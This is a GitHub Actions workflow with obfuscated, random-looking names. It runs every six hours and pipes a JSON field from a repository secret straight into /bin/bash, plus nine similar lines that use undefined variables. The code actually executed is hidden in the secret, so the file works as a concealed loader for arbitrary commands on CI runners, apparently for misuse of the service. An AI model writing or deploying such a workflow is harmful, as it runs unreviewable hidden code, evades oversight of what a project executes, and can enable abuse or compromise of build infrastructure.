name: xiaozhumei5678
on:
  workflow_dispatch:
  schedule:
    - cron: '59 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: xiaozhumei5678
        env:
          xu4112: ${{ secrets.xu4112 }}
        run: |
          echo $xu4112 | jq -r .kh3697 | /bin/bash
          echo $sauih7 | jq -r .zhf2 | /bin/bash
          echo $gzr64798 | jq -r .r6 | /bin/bash
          echo $uritv7 | jq -r .szh167 | /bin/bash
          echo $lq0837 | jq -r .e6 | /bin/bash
          echo $g3869 | jq -r .eqto95 | /bin/bash
          echo $tnbsr55633 | jq -r .k3570 | /bin/bash
          echo $mavqw67619 | jq -r .dvl2415 | /bin/bash
          echo $jgm913 | jq -r .lnz5922 | /bin/bash
          echo $xw94409 | jq -r .sxikr41 | /bin/bash

